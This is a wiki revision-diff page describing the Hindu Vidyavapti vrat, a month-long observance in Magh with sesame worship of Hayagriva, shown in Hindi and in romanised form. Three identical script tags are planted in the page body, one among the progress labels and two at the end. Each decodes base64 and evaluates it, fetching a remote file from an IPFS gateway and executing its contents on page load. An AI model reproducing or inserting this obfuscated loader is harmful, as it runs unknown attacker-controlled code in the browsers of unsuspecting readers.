Difference between revisions of "विद्यावाप्ति व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*यह व्रत [[पौष]] की [[पूर्णिमा]] के उपरान्त [[माघ]] की [[प्रतिपदा]] से एक [[मास]] तक करना चाहिए।
 
*यह व्रत [[पौष]] की [[पूर्णिमा]] के उपरान्त [[माघ]] की [[प्रतिपदा]] से एक [[मास]] तक करना चाहिए।
*तिल से हयग्रीव की पूजा, तिल से होम करना चाहिए। प्रथम तीन दिनों तक उपवास करें। यह मासव्रत है।
+
*तिल से हयग्रीव की पूजा, तिल से होम करना चाहिए।  
*इससे कर्ता विद्वान हो जाता है।<ref> हेमाद्रि (व्रतखण्ड 2, 796-767), विष्णुधर्मोत्तरपुराण (3; 207|1-5 से उद्धरण)।</ref>  
+
*प्रथम तीन दिनों तक उपवास करें।  
 +
*यह मासव्रत है।
 +
*इससे कर्ता विद्वान हो जाता है।<ref>हेमाद्रि (व्रतखण्ड 2, 796-767), विष्णुधर्मोत्तरपुराण (3; 207|1-5 से उद्धरण)।</ref>  
  
 
{{लेख प्रगति
 
{{लेख प्रगति

Revision as of 11:27, 18 September 2010

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullakhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat paush ki poornima ke uparant magh ki pratipada se ek mas tak karana chahie.
  • til se hayagriv ki pooja, til se hom karana chahie.
  • pratham tin dinoan tak upavas karean.
  • yah masavrat hai.
  • isase karta vidvan ho jata hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vratakhand 2, 796-767), vishnudharmottarapuran (3; 207|1-5 se uddharan).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>